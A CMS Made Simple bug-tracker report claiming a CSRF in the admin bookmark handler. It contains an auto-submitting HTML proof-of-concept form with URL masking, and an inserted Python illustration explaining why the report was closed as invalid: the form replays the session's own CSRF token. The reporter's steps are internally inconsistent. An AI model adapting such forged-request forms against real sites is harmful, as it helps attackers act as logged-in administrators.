CMS MADE SIMPLE FORGE

CMS Made Simple Core


[#12316] CSRF on Shortcuts

Created By: rahul gautam (G@merited)
Date Submitted: Fri May 29 07:52:28 -0400 2020

Assigned To: Fernando Morgado (JoMorg)
Version: 2.2.14
CMSMS Version: 2.2.14
Severity: Major
Resolution: Invalid
State: Closed
Summary:
CSRF on Shortcuts
Detailed Description:
Hello,

  I discovered a CSRF vulnerability on Shortcuts. Steps to reproduce:

1) Capture the request for changing Locking
2) Check all the extracted data and build an HTML page, for example:

<html>
  <body>
    <!-- Cosmetic: rewrite the visible URL so the page looks like "/" -->
    <script>history.pushState('', '', '/')</script>
    <!-- Auto-submit target: the admin bookmark handler. Note that the __c
         parameter (entity-encoded below as &#95;&#95;c) is present both in
         the action URL and as a hidden field, with the value captured
         from the reporter's own session. -->
    <form
      action="http://cms.pick/cmsms-2.2.14-install/admin/addbookmark.php?__c=543fbd2ceebe218581e"
      method="POST">
      <input type="hidden" name="&#95;&#95;c" value="543fbd2ceebe218581e" />
      <input type="hidden" name="title" value="apple" />
      <!-- Entity-encoded "https://www.p.com" -->
      <input type="hidden" name="url" value="https&#58;&#47;&#47;www&#46;p&#46;com" />
      <input type="hidden" name="addbookmark" value="true" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


3) Play with the values in it and change them
4) Send it to the admin and click Submit request
5) The lockout time is changed for the admin

This vulnerability affects the latest version of CMS Made Simple (2.2.14) and
below. The vulnerability can be mitigated by using CSRF tokens.
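The decisive detail in the PoC above is the `__c` field: the form only works because it replays the secret token captured from the reporter's own logged-in session. The script below is an added illustration, not code from the report or from CMS Made Simple; the token check is a hypothetical stand-in for whatever `addbookmark.php` actually does with `__c`, and the HTML is a constructed copy of the posted form. It parses the hidden fields the browser would POST, then runs the same body against (1) the session the token came from, (2) a different admin's session, and (3) the form with `__c` stripped, which is what a genuine cross-site attacker could build.

```python
"""Why the posted PoC is not a CSRF: it replays the victim's own __c token.

Added illustration, not CMSMS code. check_csrf_token() is a hypothetical
stand-in for whatever the real addbookmark.php does with the __c parameter.
"""
import hmac
import secrets
from html.parser import HTMLParser

# Constructed sample: the reporter's PoC form. The &#95; entity encoding is how
# the form appeared in the report; the browser decodes the name to "__c".
POC_HTML = """
<form action="http://cms.pick/cmsms-2.2.14-install/admin/addbookmark.php?__c=543fbd2ceebe218581e"
      method="POST">
  <input type="hidden" name="&#95;&#95;c" value="543fbd2ceebe218581e" />
  <input type="hidden" name="title" value="apple" />
  <input type="hidden" name="url" value="https&#58;&#47;&#47;www&#46;p&#46;com" />
  <input type="hidden" name="addbookmark" value="true" />
  <input type="submit" value="Submit request" />
</form>
"""


class HiddenFieldParser(HTMLParser):
    """Collect hidden input name/value pairs, i.e. what the browser would POST."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser already decodes entity references in attributes
        if tag == "input" and a.get("type") == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value", "")


def poc_post_body(html):
    """Return the POST body the PoC page would submit, as a dict."""
    parser = HiddenFieldParser()
    parser.feed(html)
    return parser.fields


def check_csrf_token(post, session_token, field="__c"):
    """Hypothetical server-side check: the request must carry the secret token
    bound to the logged-in session. Constant-time compare so the check itself
    does not leak the token byte by byte."""
    supplied = post.get(field)
    if not supplied or not session_token:
        return False
    return hmac.compare_digest(supplied, session_token)


def submit_bookmark(post, session_token):
    """Outcome of POSTing `post` into a session whose token is `session_token`."""
    if not check_csrf_token(post, session_token):
        return "rejected: missing or wrong __c"
    return "bookmark added: " + post.get("title", "")


def new_session_token():
    """Per-session secret; no other origin can read it, so an attacker cannot embed it."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    body = poc_post_body(POC_HTML)
    # 1. Reporter submits the PoC in the same session the token was captured from.
    print(submit_bookmark(body, "543fbd2ceebe218581e"))
    # 2. A different admin, whose token the attacker never saw: rejected.
    print(submit_bookmark(body, new_session_token()))
    # 3. The page an attacker could really host (no __c): rejected.
    print(submit_bookmark({k: v for k, v in body.items() if k != "__c"},
                          "543fbd2ceebe218581e"))
```

Only case 1 succeeds, and it requires knowing the victim's session-bound token in advance. A PoC that needs that token is a replay of an authenticated request, not a cross-site request forgery; the test for a real CSRF is whether the form still works with the token field removed or filled with an attacker-chosen value.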


History

Comments
Date: 2020-09-05 06:48
Posted By: Ruud van der Velden (ruudvdvelden)

For the record, you're also submitting the secret CSRF token with your request
(the __c=543fbd2ceebe218581e parameter/field). Do you still think this is a CSRF
issue?
      
Date: 2020-09-19 10:21
Posted By: rahul gautam (G@merited)

Hey, if that's a CSRF token then it's not an issue for the time being :)

      
Date: 2020-09-19 10:23
Posted By: Ruud van der Velden (ruudvdvelden)

Thanks for confirming.

Report closed as invalid.
      
Updates

Updated: 2020-09-19 10:23
resolution_id: 10 => 9
state: Open => Closed

Updated: 2020-09-19 09:27
resolution_id: => 10